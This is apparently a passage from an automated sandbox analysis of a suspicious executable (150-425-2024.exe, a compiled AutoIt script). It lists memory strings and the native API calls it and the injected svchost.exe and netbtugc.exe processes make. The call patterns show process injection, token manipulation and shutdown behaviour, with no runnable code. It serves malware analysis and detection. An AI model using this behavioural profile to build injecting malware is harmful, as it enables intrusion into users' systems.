Source: 150-425-2024.exe, 00000000.00000000.1431945783.0000000000C75000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4e713a88-c
Source: 150-425-2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2c7ef970-c
Source: 150-425-2024.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_08ea8ab0-3

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0062B363 NtClose,	2_2_0062B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00601D09 NtProtectVirtualMemory,	2_2_00601D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,	2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,	2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274340 NtSetContextThread,	2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03274650 NtSuspendThread,	2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BA0 NtEnumerateValueKey,	2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272B80 NtQueryInformationFile,	2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BE0 NtQueryValueKey,	2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272BF0 NtAllocateVirtualMemory,	2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AB0 NtWaitForSingleObject,	2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AF0 NtWriteFile,	2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272AD0 NtReadFile,	2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F30 NtCreateSection,	2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F60 NtCreateProcessEx,	2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FA0 NtQuerySection,	2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FB0 NtResumeThread,	2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272F90 NtProtectVirtualMemory,	2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272FE0 NtCreateFile,	2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E30 NtWriteVirtualMemory,	2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,	2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272E80 NtReadVirtualMemory,	2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272EE0 NtQueueApcThread,	2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D30 NtUnmapViewOfSection,	2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D00 NtSetInformationFile,	2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272D10 NtMapViewOfSection,	2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DB0 NtEnumerateKey,	2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272DD0 NtDelayExecution,	2_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C00 NtQueryInformationProcess,	2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C60 NtCreateKey,	2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CA0 NtQueryInformationToken,	2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtOpenProcess,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CC0 NtQueryVirtualMemory,	2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273010 NtOpenDirectoryObject,	2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273090 NtSetValueKey,	2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032739B0 NtGetContextThread,	2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D10 NtOpenProcessToken,	2_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D70 NtOpenThread,	2_2_03273D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E4340 NtSetContextThread,LdrInitializeThunk,	4_2_032E4340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E4650 NtSuspendThread,LdrInitializeThunk,	4_2_032E4650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2B60 NtClose,LdrInitializeThunk,	4_2_032E2B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_032E2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_032E2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_032E2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2AF0 NtWriteFile,LdrInitializeThunk,	4_2_032E2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2AD0 NtReadFile,LdrInitializeThunk,	4_2_032E2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2F30 NtCreateSection,LdrInitializeThunk,	4_2_032E2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2FB0 NtResumeThread,LdrInitializeThunk,	4_2_032E2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2FE0 NtCreateFile,LdrInitializeThunk,	4_2_032E2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_032E2E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_032E2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_032E2D30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_032E2D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_032E2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_032E2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2C60 NtCreateKey,LdrInitializeThunk,	4_2_032E2C60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_032E2C70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_032E2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E35C0 NtCreateMutant,LdrInitializeThunk,	4_2_032E35C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E39B0 NtGetContextThread,LdrInitializeThunk,	4_2_032E39B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2B80 NtQueryInformationFile,	4_2_032E2B80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2AB0 NtWaitForSingleObject,	4_2_032E2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2F60 NtCreateProcessEx,	4_2_032E2F60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2FA0 NtQuerySection,	4_2_032E2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2F90 NtProtectVirtualMemory,	4_2_032E2F90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2E30 NtWriteVirtualMemory,	4_2_032E2E30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2EA0 NtAdjustPrivilegesToken,	4_2_032E2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2D00 NtSetInformationFile,	4_2_032E2D00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2DB0 NtEnumerateKey,	4_2_032E2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2C00 NtQueryInformationProcess,	4_2_032E2C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2CF0 NtOpenProcess,	4_2_032E2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E2CC0 NtQueryVirtualMemory,	4_2_032E2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E3010 NtOpenDirectoryObject,	4_2_032E3010
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E3090 NtSetValueKey,	4_2_032E3090
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E3D10 NtOpenProcessToken,	4_2_032E3D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E3D70 NtOpenThread,	4_2_032E3D70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A27920 NtCreateFile,	4_2_00A27920
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A27A70 NtReadFile,	4_2_00A27A70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A27BE0 NtClose,	4_2_00A27BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A27B50 NtDeleteFile,	4_2_00A27B50
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A27D30 NtAllocateVirtualMemory,	4_2_00A27D30

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00C240B1

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C18858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C18858

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C2545F

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BCE800	0_2_00BCE800
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BEDBB5	0_2_00BEDBB5
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C4804A	0_2_00C4804A
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BCE060	0_2_00BCE060
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD4140	0_2_00BD4140
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE2405	0_2_00BE2405
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BF6522	0_2_00BF6522
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C40665	0_2_00C40665
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BF267E	0_2_00BF267E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE283A	0_2_00BE283A
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD6843	0_2_00BD6843
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BF89DF	0_2_00BF89DF
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C40AE2	0_2_00C40AE2
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BF6A94	0_2_00BF6A94
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD8A0E	0_2_00BD8A0E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C1EB07	0_2_00C1EB07
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C28B13	0_2_00C28B13
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BECD61	0_2_00BECD61
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BF7006	0_2_00BF7006
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD3190	0_2_00BD3190
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD710E	0_2_00BD710E
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BC1287	0_2_00BC1287
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE33C7	0_2_00BE33C7
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BEF419	0_2_00BEF419
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD5680	0_2_00BD5680
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE16C4	0_2_00BE16C4
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE78D3	0_2_00BE78D3
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BD58C0	0_2_00BD58C0
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE1BB8	0_2_00BE1BB8
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BF9D05	0_2_00BF9D05
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BCFE40	0_2_00BCFE40
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BEBFE6	0_2_00BEBFE6
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00BE1FD0	0_2_00BE1FD0
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_038D3670	0_2_038D3670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00616871	2_2_00616871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00616873	2_2_00616873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006028A0	2_2_006028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00610173	2_2_00610173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00601110	2_2_00601110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0060E1F3	2_2_0060E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00601290	2_2_00601290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00603500	2_2_00603500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006026A0	2_2_006026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0060268A	2_2_0060268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00602698	2_2_00602698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0060FF4A	2_2_0060FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0062D753	2_2_0062D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0060FF53	2_2_0060FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033003E6	2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C02C0	2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230100	2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F41A2	2_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033001AA	2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81CC	2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264750	2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C6E0	2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03300591	2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4420	2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F2446	2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE4F6	2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6BD7	2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A9A6	2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A840	2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032268B8	2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E8F0	2_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282F28	2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260F30	2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E2F30	2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4F40	2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEFA0	2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CFE0	2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232FC8	2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEE26	2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240E59	2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252E90	2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCE93	2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEEDB	2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AD00	2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DCD1F	2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258DBF	2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323ADE0	2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240C00	2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0CB5	2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230CF2	2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F132D	2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D34C	2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328739A	2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032452A0	2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E12ED	2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B2C0	2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327516C	2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F172	2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B16B	2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B1B0	2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70E9	2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF0E0	2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF0CC	2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032470C0	2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF7B0	2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F16CC	2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7571	2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD5B0	2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF43F	2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231460	2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB76	2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FB80	2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5BF0	2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DBF9	2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B3A6C	2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA49	2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7A46	2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DDAAC	2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285AA0	2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E1AA3	2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EDAC6	2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D5910	2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249950	2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B950	2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD800	2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032438E0	2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF09	2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFFB1	2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241F92	2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD2	2_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD5	2_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249EB0	2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D73	2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243D40	2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1D5A	2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FDC0	2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9C32	2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFCF2	2_2_032FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336A352	4_2_0336A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033703E6	4_2_033703E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032BE3F0	4_2_032BE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03350274	4_2_03350274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033302C0	4_2_033302C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032A0100	4_2_032A0100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0334A118	4_2_0334A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03338158	4_2_03338158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033701AA	4_2_033701AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033681CC	4_2_033681CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03342000	4_2_03342000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B0770	4_2_032B0770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032D4750	4_2_032D4750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032AC7C0	4_2_032AC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032CC6E0	4_2_032CC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B0535	4_2_032B0535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03370591	4_2_03370591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03362446	4_2_03362446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0335E4F6	4_2_0335E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336AB40	4_2_0336AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03366BD7	4_2_03366BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032AEA80	4_2_032AEA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032C6962	4_2_032C6962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B29A0	4_2_032B29A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0337A9A6	4_2_0337A9A6
